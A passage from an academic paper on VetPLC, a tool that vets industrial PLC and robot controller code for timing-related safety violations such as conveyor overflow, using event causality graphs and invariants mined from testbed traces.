END_IF 60END_PROGRAM Fig. 2: PLC ST Code for Picking Up Processed Parts Cell 1, the PLC code (Ln.29-34) will further check the Boolean inputs, CNC Part Ready ,Robot Ready andNOT(Part - AtConveyor) , to con rm the existence of a processed part, availability of robot and clearance of parts on the conveyor,respectively. If all the conditions are satis ed, the PLC will then perform two actions: 1) requesting the robot to pass the processed part to pallet and 2) updating the manufacturing process number on the part. Two signals Deliver Part and Update Part Process are thus enabled. 1)Deliver Part . Based upon con guration, the variable Deliver Part is mapped to a digital input ( DI[0] )o nt h e robot side. Being true, this signal triggers the robot program in Figure 8 to execute. The robot code then operates therobot arm, via a series of motion instructions such as linear movement L or joint movement J , in order to pick up a part from the CNC machine (Figure 8 Ln.6-12) and passit to the conveyor (Figure 8 Ln.18-20). When the part has beendelivered to the conveyor, the robot turns on its output signal DO[2] for 0.5 seconds to indicate the completion (Figure 8 Ln.22-24). This output is then mapped to Part AtConveyor on the PLC. In the end, the robot returns to a safe zone. 2)Update Part Process . When this variable is true, a subroutine UPDATE PART(int) is called to conduct a 15- step I/O operation on the RFID attached to the part (Ln.36- 39). 
When this is done, the subroutine (Ln.47-60) will receive aRFID IOComplete signal and then notify its caller by setting the Boolean variable Update Complete . To check whether the two actions are completed, PLC constantly reads two response signals Part AtConveyor and Update Complete . When both signals are true, PLC will retract the stopper to transfer this loaded pallet (Ln.41-44). Safety Violation and Root Cause. This code, in fact, can lead to item over ow [9], which is a typical type ofsafety issues on the factory oor. Fundamentally, it is causedby mismatched expectations between the sender (robot) and receiver (PLC) of event Part AtConveyor s duration. The signal Part AtConveyor has dual purposes. When it is true, it indicates the robot has delivered a part to the pallet, which can now leave the cell. When it is off, that means the conveyor has been cleared to accept a new part, and the robot can then move away from conveyor for anotherdelivery. However, in practice, the robot does not need to stop at conveyor waiting for the pallet to leave. Although the robot cannot pass the second part to the conveyor prior to thedeparture of rst one, the robot can, in fact, move towards theCNC in advance to save time for the next delivery. For the sake of saving time, the developers implemented a timeout in the robot code and only allowed the event Part AtConveyor (DO[2] ) to last for 0.5 seconds (Figure 8 Ln.23-24), no matter if the conveyor is cleared by then. As a result, the robot is guaranteed to start handling another delivery 0.5 seconds after the previous one. Unfortunately, if the robot turns off Part AtConveyor prematurely, the PLC may never see both Part AtConveyor andUpdate Complete being set to true at the same time, either due to an unexpectedly fast part delivery or slow RFIDupdate. This is also because PLC developers typically do notbuffer old signal values (in this case, Part AtConveyor being TRUE ) but rather always read data directly from theirorigins, in order to avoid synchronization problem. In fact, a real-world error has been reported from the SMART testbed when the speed of robot is increased to a certain extent, and thus Part AtConveyor ends even before the update of process number is complete. Then,there exists no window when both Update Complete and Part AtConveyor are true (Figure 3b). In that case, even if the pallet has already been loaded, it can never leave the cell. This error can cause a serious safety issue since the con- veyor will over ow due to the constantly arriving pallets.  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. 
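The race just described can be made concrete with a deliberately simplified timing model. In the Python sketch below (ours; only the 0.5 s signal duration comes from the robot code described above, while the RFID update time, the horizon and the time step are made-up parameters), both Deliver_Part and Update_Part_Process are assumed to be issued at time zero, and we simply ask whether there is ever an instant at which Part_AtConveyor and Update_Complete are true together, which is what the PLC code at Ln.41-44 waits for.

# Hypothetical timings in seconds.
def window_exists(rfid_update_time, part_at_conveyor_duration=0.5, step=0.01):
    t, window = 0.0, False
    while t < 60.0:
        part_at_conveyor = t < part_at_conveyor_duration   # robot-side timeout
        update_complete = t >= rfid_update_time            # RFID I/O finished
        if part_at_conveyor and update_complete:
            window = True          # PLC would retract the stopper (Ln.41-44)
        t += step
    return window

print(window_exists(0.3))   # True:  the pallet can leave the cell
print(window_exists(0.8))   # False: the conjunction never holds

With a fast RFID update the window exists and the loaded pallet departs; with a slow one it never does, which is exactly the distinction between the event sequences discussed next.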
Fig. 3: Event Sequences with Different Orders and Timings ((a) Sequence 1, (b) Sequence 2, (c) Sequence 3)
Eventually, this overflow will cause pallets to collide and fall, or even cause the overloaded conveyor to break. Though seemingly straightforward, this is in fact a typical safety violation that can cause severe injuries on the factory floor and has thus attracted attention in both industrial practice [5], [6], [9] and academic research [37]. It is worth noting that although we highlight this issue using a collaborating PLC and robot, it is actually a common problem that can be caused by the coordination of any types of controllers, such as multiple PLCs, PLCs and CNCs (controlled by an integrated slave PLC), or CNCs and robots. Both our experience and domain knowledge from field engineers (from Rockwell) show that a large portion of PLC safety problems originate from the coordination required between multiple units, because these units are manufactured by different vendors and programmed individually without considering different contexts (e.g., timing). Nevertheless, we believe the problem involving PLCs and robots is the most challenging one to address because it requires the understanding of multiple programming languages and their interactions. Hence, we focus on such a case to explain our approach. However, as we show in the evaluation, our system can be applied to other classes of coordinating systems as well.
Challenge for Detecting the Problem. Static analyses may cause significant false positives due to the lack of runtime constraints and thus cannot easily address this problem. For instance, a potential error state detected by static analysis may only be triggered when the speed of the robot is greater than 10 m/sec, which can never be reached in practice. In contrast, dynamic analysis and symbolic execution do not cause false positives. To use them on event-driven programs, prior work [27], [46], [51], [55], [66], [67] generated event sequences of different orders to exercise code and explore paths. In our case, one can create an event sequence following the order 1: Pallet_Sensor -> 2: ¬Part_Sensor -> 3: CNC_Part_Ready -> 4: Robot_Ready -> 5: Part_AtConveyor -> 6: Update_Complete -> 7: ¬Part_AtConveyor, as illustrated in Figure 3a.
Note that Part_AtConveyor eventually terminates due to the robot logic. Exercising the PLC code using this sequence does not lead to any error. One can then permute the events by switching 6: Update_Complete and 7: ¬Part_AtConveyor (Figure 3b). Then, the safety problem will occur at runtime. However, just rearranging the event order may not solve the path discovery problem in time-constrained controller programs. For instance, the event sequence in Figure 3c shares the same ordering as the one in Figure 3b, yet it cannot cause the error. When the time difference between events 7 and 6 changes, the consequence may also vary. To address this problem, we expect to automatically produce effective, error-triggering event sequences (such as Figure 3b) by considering both the ordering and the timing of events. Notice that an alternative approach is to model internal timeouts as external events and then perform event permutation without considering timing. For example, the termination of event Part_AtConveyor can then become another independent event, and the permutation is thus conducted over 8 events. However, we would argue that this solution has two major shortcomings: 1) it may drastically increase the event space; and 2) the generated sequences can cause false alarms because they may still violate critical time and physical constraints and thus are actually invalid. Its fundamental limitation lies in the fact that it assumes the complete independence of individual events and does not quantitatively consider their temporal contexts.
B. Threat Model
We consider that adversaries can trigger vulnerabilities in benign (but faulty) PLC code via manipulation of configuration options that impact important physical properties such as machine speeds. In addition, we also consider that insiders can compromise PLC source code to intentionally inject (stealthy) safety violations (e.g., PLC logic bombs [41]). Note that insider attacks are top security challenges [40], [64] for air-gapped ICS and have been identified in major ICS incidents including Stuxnet and the Maroochy Water Services Attack [23]. As a result, PLC source code and configurations may not be trustworthy. Note, though, that we assume the rest of the ICS environment, including hardware and operating systems, as well as our data collection mechanisms, to be trusted. It is worth mentioning that, at this point, our work mainly focuses on the detection of safety violations. However, some of the techniques we developed can also be useful to address security challenges in the ICS context.
Fig. 4: Overview of VetPLC System (generating event causality graphs, mining temporal invariants, and automated safety vetting with timed event sequences)
C. System Overview
To achieve our goal, we have developed VetPLC, which consists of 3 major steps. Figure 4 illustrates its architecture. We hope to deploy VetPLC as a vetting tool to examine any PLC code before it is released for a production system.
(1) Generating Event Causality Graph. Given the PLC and robot code, we first perform static program analyses to extract the event causality graphs for the interconnected devices. We further leverage the specified I/O mapping to handle cross-device communication.
(2) Mining Temporal Invariants. Next, to understand those quantitative temporal relations that cannot be revealed by program code, we collect runtime data traces of PLC variables from physical ICS testbeds. We then examine the traces to infer the occurrences of particular events and conduct data mining to discover temporal event invariants.
(3) Automated Safety Vetting with Timed Event Sequences. Constrained by the generated timed event causality graphs, we perform event permutations to automatically create timed event sequences. Then, we apply the generated sequences to exercise PLC code for dynamic analysis. To automatically identify safety problems, we formalize and craft safety specifications according to expert knowledge so as to perform runtime verification.
IV. TIMED EVENT CAUSALITY GRAPH
A. Key Factors
A naive approach to deriving event sequences is to consider every combination of events. For instance, prior work has presented a baseline approach, ALLSEQS [27], that exhaustively permutes all UI events to create triggering sequences for testing Android apps. However, due to the massive number of possible permutations, such a solution can be prohibitively time-consuming. In fact, not all permutations are valid sequences, because the causal dependencies of PLC events are inherently constrained by controller code. To reduce the search space, we can extract such dependencies from the program logic in the first place. Particularly, we are interested in three causal factors.
Control-Flow. We take into account intra-procedural, inter-procedural and cross-device control-flow dependencies: 1) within a function, event variables evaluated in an IF-Condition have a direct causal impact on those defined in its IF-Clause; 2) for function calls, we consider that the call site in the caller causes all the logic in the callee; 3) cross-device event exchanges via mapped I/O indicate the causal relations between code on multiple controllers.
Constants. The constant value of an event-related variable in an IF-Condition can partially determine whether the IF-Clause becomes effective. Thus, the data flow from the constant assignment to the condition check of this variable indicates that the former causes the latter.
Event Duration. The causal effect of events may last for a certain amount of time when subsequent states are maintained. Machines with local memory can produce events with permanent states. The PLC can also help preserve the states of transient signals (i.e., sensor readings) or of its internal events. In the meantime, event senders can also proactively terminate signals based upon timing.
In addition to these internal factors, the occurrences of events are also affected by external timing constraints caused by physical actions, such as robot motion and external I/O operations. We will discuss this in Section V.
B. Formal Definition
To interpret the internal constraints on event ordering, we extract the causal and temporal relations among events from PLC and robot code to generate dependency graphs.
In particular, we describe the cross-device event dependencies using Timed Event Causality Graphs (TECGs). At a high level, a TECG is based upon the And-Or Graph [53] that can illustrate the causalities among events and express their and/or relationships. A formal definition is presented as follows.

Fig. 5: The TECG of the Motivating Example

Definition 1. A Timed Event Causality Graph is a directed graph G = (V, E, λ, τ) over a set of events Σ and a set of time durations T, where:

The set of vertices V corresponds to the events in Σ;

The set of edges E ⊆ V × V corresponds to the causal dependencies between events, where the combination of all immediate predecessors of a vertex can always cause this successor event to happen. Specifically, if some of these predecessor vertices form a conjunction, their outgoing edges become compounded using an arch; if they form a disjunction, the corresponding edges are separated.

The labeling function λ : V → Σ associates nodes with the labels of corresponding events, where each label is comprised of 3 elements: event name, class and duration. An event is named after the atomic proposition it affects. For instance, if an event causes a==15 to be true, we name it a==15; if it causes Boolean c to be false, we refer to it as ¬c. We consider 6 classes of events, including input (P_IN), output (P_OUT) and local (P_Local) events of the PLC and those of a remote device (R_IN, R_OUT, R_Local). The event duration is either Permanent (P), meaning it is always enabled until turned off by PLC logic, or a finite amount of time.

The labeling function τ : E → T associates edges with the labels of time intervals. These labels are concrete numbers if we can retrieve the corresponding time intervals from ICS testbeds; otherwise, they are Indeterminate.

C. TECG of Motivating Example

Figure 5 depicts the TECG of the motivating example. At first, this automation system expects to receive events from two sensors. The conjunction of a positive event, Pallet_Sensor, and a negative one, ¬Part_Sensor, triggers the PLC local event Pallet_Arrival. Then, if all of the 4 events, Pallet_Arrival, CNC_Part_Ready, Robot_Ready and ¬Part_AtConveyor, are received, the PLC will signal the robot via an output event Deliver_Part. Hence, the conjunction of these four events leads to the generation of Deliver_Part, and such a causal dependency is represented by the compounded edges from the former to the latter.
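To make Definition 1 and the compounded (conjunctive) edges concrete, the following is a minimal sketch of one way such a graph could be represented; the class and field names are illustrative assumptions, not VETPLC's actual data structures.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Event classes and durations as introduced in Definition 1.
EVENT_CLASSES = {"P_IN", "P_OUT", "P_Local", "R_IN", "R_OUT", "R_Local"}
PERMANENT = None  # 'Permanent' duration; otherwise a float number of seconds

@dataclass
class Vertex:
    name: str                           # atomic proposition, e.g. "Deliver_Part" or "¬c"
    cls: str                            # one of EVENT_CLASSES
    duration: Optional[float] = PERMANENT

@dataclass
class TECG:
    vertices: Dict[str, Vertex] = field(default_factory=dict)
    # And-Or structure: each successor maps to a list of predecessor groups.
    # Every event inside one group (a conjunction) must occur to cause the successor;
    # distinct groups are alternative (disjunctive) causes.
    causes: Dict[str, List[List[str]]] = field(default_factory=dict)
    # Edge labels: (pred, succ) -> (lower, upper) time interval, or None if Indeterminate.
    intervals: Dict[Tuple[str, str], Optional[Tuple[float, float]]] = field(default_factory=dict)

    def add_compound_edges(self, group: List[str], succ: str) -> None:
        """Add one conjunctive predecessor group (an 'arch' in Figure 5) for succ."""
        self.causes.setdefault(succ, []).append(group)
        for pred in group:
            self.intervals.setdefault((pred, succ), None)  # Indeterminate by default
```

With this structure, the four-event conjunction above becomes a single predecessor group for Deliver_Part, added via add_compound_edges(["Pallet_Arrival", "CNC_Part_Ready", "Robot_Ready", "¬Part_AtConveyor"], "Deliver_Part").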
Further, Deliver_Part is mapped to the robot event DI[0], which causes the robot arm to function. Once its operation is completed, the robot turns on the output DO[2] and in effect sends the event Part_AtConveyor back to the PLC. Thus, these events are connected due to cross-device control dependencies. Since DO[2] (Part_AtConveyor) terminates in 0.5 seconds according to the robot code, its duration is 0.5s instead of Permanent.

In the meantime, when the conjunction of the aforementioned 4 events is satisfied, another PLC local event Update_Part_Process will occur. This event causes a subroutine call, in which the PLC starts to update the process number encoded in the RFID on the part. Once the update is done, the RFID replies to the PLC with RFID_IOComplete, which in turn triggers Update_Complete that the main routine expects.

By default, the time intervals of all edges are Indeterminate, and thus are not shown on this graph. We later perform data mining on traces collected from ICS testbeds to extract temporal invariants associated with certain edges, such as Update_Part_Process →[3s, 39.4s] RFID_IOComplete.

D. Graph Construction

To generate TECGs, we perform static analyses that are tailored for the unique programming paradigms of PLC code.

a) Special Consideration for PLC Scan Cycles: Prior work has paid special attention to PLCs' dedicated data types, such as Timers and Counters [54], and their preemptive thread scheduling model [43]. In addition, we believe that it is also crucial to take into account PLC scan cycles, which cause an implicit yet significant impact on the entry points and data flow of PLC code. Nevertheless, to the best of our knowledge, this has never been seriously explored in prior work.

Entry Point Discovery. PLC code is event-driven and thus all its event handlers are program entry points. In contrast to typical event-driven programs that use dedicated constructs to explicitly implement event handling mechanisms, event handlers in PLC code are implicitly defined using IF-Conditions. Because internal value changes in one scan cycle do not become effective until the next one begins, the IF-Conditions in PLC code can only be affected by external inputs received at the beginning of a cycle. Therefore, in effect, they act as event handlers to capture either new sensor readings or updates from the last cycle. Hence, an IF-Condition becomes the entry point of its IF-Clause code as well as the subroutines called by the IF-Clause. For IF-Clause code wrapped by nested IF-Conditions, we consider the inner-most one to be its entry point.

Dataflow Analysis. The fact that variables are of fixed value in every cycle also causes the data flow to change. As explained in Section II, the process of dataflow analysis for PLC code is mainly to track data dependencies between scan cycles. Further, due to the existence of asynchronous event handlers, the analysis should compute data reachability from any define in one cycle to any use in the next.

b) Graph Construction Algorithm: Our algorithm for generating timed event causality graphs is illustrated in Algorithm 1. This algorithm expects to receive three inputs, PLC, REMOTE and IOMapping.
They represent PLC code, a set of remote controller code (e.g., robot code) and the I/O mappings between PLC and remote devices, respectively. Its output is a timed event causality graph, TECG, which is comprised of a set of edges. The I/O mappings are automatically established when remote devices are added to the PLC and thus can be retrieved from PLC configurations.

During initialization, we set TECG to be an empty set. Next, we transform all predicates in the IF-Conditions of PLC code into disjunctive normal form (DNF) in order to illustrate them using an And-Or graph. Thus, an original predicate becomes a set of sub-predicates connected via OR logic, while each sub-predicate is a conjunction of events depicted as compounded edges. Further, we retrieve all the entry points (i.e., IF-Conditions) EP of the PLC code. Meanwhile, we also link neighbors of nested IF-Conditions to show their control relations.

Then, we iterate over every event (i.e., atomic proposition) p_in in EP and seek its root causes, which are events or event combinations that can always lead to p_in. We first aim to discover the root causes for p_in within the PLC code. To this end, we perform use-def chain analysis to obtain the definition set DEF of p_in and then look for the entry point EP′ (again, an IF-Condition) of each definition def in DEF. The events in EP′ thus have causal impact on def and on p_in. To ensure the positive causal dependency between EP′ and p_in, we also conduct constant analysis for def. If def is a constant and its value can satisfy p_in, we can then determine that EP′ can cause p_in to happen. Hence, we call TECG.ADDCOMPOUNDEDGES() to link EP′ with p_in and handle the construction of compounded edges.

It is worth noting that since IF-Conditions in one scan cycle can be affected by any code in the previous one (dataflow-wise), our use-def chain and constant analyses will look for definitions from everywhere in PLC code. Ideally, we can consider an infinite chain of scan cycles and compute backward data flow exhaustively in an iterative fashion. However, such computation is excessively expensive. Besides, the generated dependencies can be extremely complex (e.g., conditional dependencies) and therefore may not be easily applied to event sequence generation. Thus, in practice, we take a conservative approach and only look back for one previous cycle. As a result, our analysis may miss some dependencies in specific conditions. Nevertheless, while missing a dependency may lead to invalid permutations of events, it does not result in the exclusion of valid event sequences. Moreover, our evaluation shows that, although conservative, our analysis can already help remove a large number of invalid sequences.

Besides searching for intra-PLC causalities, we also seek possible root causes of p_in across devices. Our cross-device analysis starts from Ln.13. It is performed on an on-demand basis and only begins when p_in is mapped to an output of a remote device. If p_in indeed exists in the IOMapping, we retrieve its mapped counterpart r_out and add an edge (r_out, p_in) to TECG. Then, we search for the entry point REP for r_out in the code of the remote controller (e.g., robot, CNC, PLC). The entry point REP represents the trigger of r_out. If any input r_in in REP can be mapped to a PLC output p_out, the edge (p_out, r_in) will be added to TECG as well. We then trace back from p_out to find its entry point EP′ in PLC code, and add compounded edges from EP′ to p_out.
Algorithm 1 Construction of Timed Event Causality Graph
1:  procedure BUILDTECG(PLC, REMOTE, IOMapping)
2:      TECG ← ∅
3:      TRANSFORMPREDICATESTODNF(PLC)
4:      EP ← GETANDLINKENTRYPOINTS(PLC)
5:      for p_in ∈ EP do
6:          DEF ← USEDEFCHAIN(PLC, p_in)
7:          for def ∈ DEF do
8:              if ISCONST(def) ∧ ISSATISFIED(p_in, def) then
9:                  EP′ ← GETENTRYPOINT(PLC, def)
10:                 TECG.ADDCOMPOUNDEDGES(EP′, p_in)
11:             end if
12:         end for
13:         if IOMapping.EXISTS(p_in) then
14:             r_out ← IOMapping.GET(p_in)
15:             TECG ← TECG ∪ (r_out, p_in)
16:             REP ← GETENTRYPOINT(REMOTE, r_out)
17:             for r_in ∈ REP do
18:                 if IOMapping.EXISTS(r_in) then
19:                     p_out ← IOMapping.GET(r_in)
20:                     TECG ← TECG ∪ (p_out, r_in)
21:                     EP′ ← GETENTRYPOINT(PLC, p_out)
22:                     TECG.ADDCOMPOUNDEDGES(EP′, p_out)
23:                 end if
24:             end for
25:         end if
26:     end for
27:     ADDEVENTCLASSANDDURATION(TECG, PLC, REMOTE)
28:     return TECG
29: end procedure

The last step for graph construction is to annotate vertices with event classes and durations. Event classes can be explicitly obtained from the variable declarations in PLC/CNC code or robot specifications. The durations of all events are by default set to be Permanent (P). Only if we can infer the concrete time duration of an event will we safely update its label. To this end, for each input event (i.e., atomic proposition), we first discover the constant definitions that cause the proposition to be true. Then, we discover all the negative redefinitions that lead the proposition to be false. Next, we perform intra-procedural reachability analysis from the definitions to those redefinitions. If a reachable path is discovered, we further examine every statement along the path to see if any time-related instructions (i.e., wait) are present. If so, we extract and accumulate their constant parameters as the duration of this event. We do not handle variable parameters in this work. The implementation is further explained in Appendix B.

V. DISCOVERY OF TEMPORAL CONTEXT

A. Data Collection

Collecting Data Instead of Events. Ideally, we hope to directly collect event traces from ICS testbeds to identify their temporal behavior. However, this requires instrumentation of various distributed data sources, including sensors, robot I/O modules, RFID, etc., and therefore is an extremely difficult and tedious task. On the contrary, the data trace of PLC variables is easier to obtain due to standardized communication protocols. Yet it only preserves the runtime states of these variables but does not record the events that cause the states to transition. To bridge this gap, we intend to infer the presence of events based upon value changes in data traces and thus manage to approximate the collection of discrete physical events with the retrieval of continuous data traces.

Interesting Properties. We are interested in three properties of PLC variables: name, value and timestamp. The variable name serves as the unique identifier of a variable; the instant value of a variable reflects its current state and can be affected by specific events; the timestamp is the system time when the variable is being observed. Thus, we can define a data item d in our observation as a triple: d = (var_name, value, time).

Querying Realtime Data in Recurring Operations. We collect both positive and negative data traces from running testbeds.
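A minimal sketch of how such (var_name, value, time) items might be logged into a data trace is shown below; read_plc_variables() is a hypothetical helper standing in for whatever protocol client reads the monitored PLC variables, and the sampling period is an arbitrary choice rather than the one used on our testbeds.

```python
import time
from typing import Callable, Dict, List, Tuple

DataItem = Tuple[str, float, float]      # (var_name, value, time), as defined above
DataTrace = List[DataItem]

def collect_trace(read_plc_variables: Callable[[], Dict[str, float]],
                  duration_s: float, period_s: float = 0.1) -> DataTrace:
    """Log every monitored PLC variable at a fixed period to form one data trace DT_i."""
    trace: DataTrace = []
    start = time.time()
    while time.time() - start < duration_s:
        now = time.time() - start
        for name, value in read_plc_variables().items():
            trace.append((name, value, now))
        time.sleep(period_s)
    return trace
```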
A positive instance begins with the arrival of an empty pallet and ends in the successful departure of a loaded pallet, and thus contains all the interesting stages such as robot delivery and RFID update. A negative instance does not lead to the successful stage due to multiple reasons, such as an arriving pallet already loaded with a part, robot not ready, CNC not ready, etc. For every instance, we keep logging all the variable values over time in order to retrieve runtime data traces. Formally, a data trace DT is a list of data items d: DT = {d_0, d_1, ..., d_n}. In practice, we run Cell-1 logic 20 times and collect 10 positive and 10 negative instances, each of which takes approximately 25 minutes. Thus, our dataset consists of a set of data traces and we refer to it as DT = {DT_0, DT_1, ..., DT_m}, where m = 19. We obtained 1.2 GB of data in 10 hours from our testbed that runs logic code containing 35 variables. It is noteworthy that, although limited, our dataset in practice can already help reveal the necessary invariants for detecting real-world safety problems. One possible solution to increase the amount and diversity of data traces is to follow a state-of-the-art technique (i.e., code mutation [33]) and automatically produce a large quantity of positive and negative data traces to cover a majority of normal and abnormal cases. We leave the systematic trace construction as future work.

B. Mining Temporal Properties

Inferring Discrete Events from Data Traces. For each data trace DT_i in our dataset DT, we need to first infer the existence of events. To this end, we first divide every DT_i into multiple sublists {DT_i^v0, DT_i^v1, ..., DT_i^vk} where items in an individual list share the same variable name. We then iterate over each sublist. If we discover a difference between the values of two neighboring items d′_l and d′_{l+1}, we record a new event e = (type, time), where the type is denoted using the new state of this variable and the time is the timestamp of d′_{l+1}. For instance, if the value of variable Deliver_Part rises from 0 to 1 at time 33, then we identify an event (Deliver_Part, 33); if Part_AtConveyor's value drops from 1 to 0 at time 60, then we find an event (¬Part_AtConveyor, 60). Eventually, we merge the discovered events from all sublists and thus convert a data trace DT_i into an event trace ET_i = {e_0, e_1, ..., e_p}. We therefore obtain a dataset of event traces ET = {ET_0, ET_1, ..., ET_19}. The formal algorithm is presented as Algorithm 3 in Appendix C.

TABLE I: Mined Invariants
    Event Pair                                   Invariant
    □(Deliver_Part → Part_AtConveyor)            [24.4s, 24.6s]
    □(Update_Part_Process → RFID_IOComplete)     [15s, 20s]
    □(Update_Part_Process → Update_Complete)     [15s, 20s]

Temporal Invariants for Events. Once we have generated event traces, we would like to uncover constant time intervals between events of different types. Such constants can reflect the operation time of specific machines. However, in reality, due to the variation in program paths and the indeterminism of mechanical, physical or chemical processes, the durations of real-world machine operations are never constant. On the other hand, due to physical and logical limits, machine actions are bounded by time constraints. Hence, our goal is to identify such soft invariants of event temporalities that fall into specific ranges.
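As a concrete illustration of the event-inference and bound-extraction steps described above, the sketch below converts value changes into events and then records, for each ordered pair of event types that satisfies the followed-by check, the observed lower and upper bounds of their time differences. It is a simplification: it omits the TECG-guided pruning and the Synoptic/Perfume machinery, and the helper names and the "!" naming of negative events are assumptions.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

DataItem = Tuple[str, float, float]      # (var_name, value, time)
Event = Tuple[str, float]                # (type, time), e.g. ("Deliver_Part", 33.0)

def infer_events(trace: List[DataItem]) -> List[Event]:
    """Turn value changes in a data trace into discrete events (cf. Algorithm 3)."""
    by_var: Dict[str, List[DataItem]] = defaultdict(list)
    for item in trace:
        by_var[item[0]].append(item)
    events: List[Event] = []
    for name, items in by_var.items():
        items.sort(key=lambda it: it[2])
        for prev, cur in zip(items, items[1:]):
            if prev[1] != cur[1]:
                # Name the event after the new state: "Deliver_Part" on a rising edge,
                # "!Deliver_Part" on a falling edge (illustrative naming convention).
                etype = name if cur[1] else "!" + name
                events.append((etype, cur[2]))
    return sorted(events, key=lambda e: e[1])

def mine_soft_invariants(event_traces: List[List[Event]]) -> Dict[Tuple[str, str], Tuple[float, float]]:
    """For every ordered pair (a, b) where each 'a' is followed by some 'b' in every
    trace, report the min/max observed time difference as a candidate soft invariant."""
    bounds: Dict[Tuple[str, str], Tuple[float, float]] = {}
    pair_ok: Dict[Tuple[str, str], bool] = defaultdict(lambda: True)
    for et in event_traces:
        types = {t for t, _ in et}
        for a in types:
            for b in types:
                if a == b:
                    continue
                diffs, followed = [], True
                for ta in (time for typ, time in et if typ == a):
                    later = [time for typ, time in et if typ == b and time > ta]
                    if not later:
                        followed = False   # Follows[a][b] != Occurrence[a] in this trace
                        break
                    diffs.append(min(later) - ta)
                if not followed:
                    pair_ok[(a, b)] = False
                elif diffs:
                    lo, hi = min(diffs), max(diffs)
                    if (a, b) in bounds:
                        plo, phi = bounds[(a, b)]
                        bounds[(a, b)] = (min(plo, lo), max(phi, hi))
                    else:
                        bounds[(a, b)] = (lo, hi)
    return {pair: rng for pair, rng in bounds.items() if pair_ok[pair]}
```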
We formally define temporal invariants using Timed Propositional Temporal Logic (TPTL) [26]:

Definition 2. Let ε_a and ε_b be two event types. Then a temporal invariant is a property that relates ε_a and ε_b in both of the two following ways:

□tx.(ε_a → ◇ty.(ε_b ∧ ty − tx ≥ lower)): In an event trace, if an event instance of type ε_a occurs at time tx, then another of ε_b will eventually happen in the same trace at a later time ty, while the time difference between ty and tx is at least lower.

□tx.(ε_a → ◇ty.(ε_b ∧ ty − tx ≤ upper)): In an event trace, if an event instance of type ε_a occurs at time tx, then another of ε_b will eventually happen in the same trace at a later time ty, while the time difference between ty and tx is at most upper.

As a result, a temporal invariant describes not only the order of two event types but also the lower and upper bounds of their time difference. To extract these invariants, we follow the approach in prior work (Synoptic [29] and Perfume [60]) to perform qualitative and quantitative data mining consecutively. However, unlike previous techniques that attempt to mine all possible correlations between any two events, our mining is selective and is guided by the generated TECG. Specifically, we do not need to learn certain temporal relationships for a pair of event types if they contradict the dependencies in the graph. For example, in our motivating case, since we know the temporal logic □(RFID_IOComplete → Update_Complete) holds, we do not further seek the possibility of whether Update_Complete is followed by RFID_IOComplete.

For all the pairwise relationships of two event types, ε_a and ε_b, that do not contradict those in TECG, we first check if their qualitative temporality □(ε_a → ε_b) holds. This is equivalent to checking if:

    Follows[ε_a][ε_b] = Occurrence[ε_a]    (1)

where Follows[ε_a][ε_b] counts, in a trace, the number of type ε_a events followed by at least one of the type ε_b events, and Occurrence[ε_a] counts the number of event instances of ε_a. Once we have determined the followed-by relationship between two event types, we use the Perfume [60] algorithm to perform quantitative mining and extract the lower and upper bounds of time differences. In the end, we discovered 3 invariants for the motivational case, as listed in Table I.

Speed Reconfiguration of Real-world Machines. The mined bounds of soft invariants, lower and upper, reflect the variation in program executions and production processes. However, such bounds are still associated with the pre-configured speeds of physical machines, which oftentimes do not reach the specified hard limits. To further understand the possible impact caused by speed reconfiguration, we need to consider absolute time bounds for these machine operations.

Let job be the number of machine operations and v_conf be the pre-configured speed; then lower ≤ job/v_conf ≤ upper. To derive the absolute lower bound for the time cost t_job, we consider the rated motor speed v_rated and thus have: (lower · v_conf)/v_rated ≤ job/v_rated ≤ t_job. Meanwhile, since the minimum machine speed can theoretically be 0, the absolute maximum time to complete a task is infinity. However, in reality, for a high throughput, machines are expected to finish jobs as quickly as possible. Thus, ideally, machines always operate at their highest speeds.
Nevertheless, safety standards have been made to regulate the maximum machine speed. For instance, the American National Standards Institute (ANSI) has published ANSI RIA R15.06 [22] for Robot and Robot System Safety, which recommends that robot speed should not exceed 10 in/sec (250 mm/sec) for safety-critical operations. Such recommendations can be considered as the lowest machine speeds that can guarantee efficient and safe production. With this required safety speed, v_safe, we can further obtain the practical upper bound of t_job:

    (lower · v_conf)/v_rated ≤ t_job ≤ (upper · v_conf)/v_safe    (2)

Admittedly, to incorporate hardware limits, we need to understand the semantics of mined invariants in order to associate this additional information with the correct edges. We currently address this problem using human knowledge and leave the automatic inference of event semantics as future work. With domain knowledge, we know the time for our robot to pass a part equals the time difference between Deliver_Part and Part_AtConveyor. Plus, our robot is running at 400 mm/sec on average and its rated speed is 3300 mm/sec. Thus, we can obtain an enhanced invariant for this event pair: [3s, 39.4s].

Enhancing TECG with Temporal Invariants. Extracted temporal invariants are then provided to the TECG. Note that they not only offer quantitative information to enhance the existing temporal relations in the graph but may also introduce new temporal dependencies. This is because the code we analyze represents only a partial view of the entire ICS environment and therefore does not contain all the event relations. As a complement, mining runtime data traces offers a holistic view of the plant and can further uncover implicit dependencies hidden from controller code.

VI. SAFETY VETTING WITH TIMED EVENT SEQUENCES

A. Timed Event Sequences

Once we have constructed the TECG, we can generate event sequences based upon this graph. The major challenge is how to create event permutations that conform to the quantitative dependencies illustrated by the TECG. Generally speaking, to encode the mined time range of an event (i.e., a soft temporal invariant) into a sequence, we discretize the continuous range into multiple time slices and introduce a versioned event for each slice to represent its possible occurrences. To reflect the qualitative relations among events, we check every possible permutation against the graph, so as to guarantee the prerequisite for each event happens before its occurrence.

Algorithm 2 Generation of Timed Event Sequences
1:  procedure BUILDTSEQS(TECG_in, δ)
2:      Set_event ← GETEVENTSET(TECG_in)
3:      Set′_event ← DISCRETIZE(Set_event, δ)
4:      SEQS ← PERMUTE(Set′_event)
5:      for SEQ ∈ SEQS do
6:          for ev ∈ SEQ do
7:              Path ← FINDALLSOLUTIONS(TECG_in, ev)
8:              if ∄ path ∈ Path : path ⊆ SEQ.SUBSEQ(0, ev) then
9:                  SEQS ← SEQS \ SEQ
10:             end if
11:         end for
12:     end for
13:     return SEQS
14: end procedure

Our algorithm BUILDTSEQS is presented in Algorithm 2. It takes two arguments. The first one is TECG_in, a reduced version of the TECG, which preserves solely the nodes that are PLC inputs. These input events are the necessary ones to exercise the PLC code. The second argument is the discretization parameter δ that indicates the number of slices every time duration is divided into. On startup, our algorithm first retrieves all the events in the graph TECG_in to generate an event set Set_event.
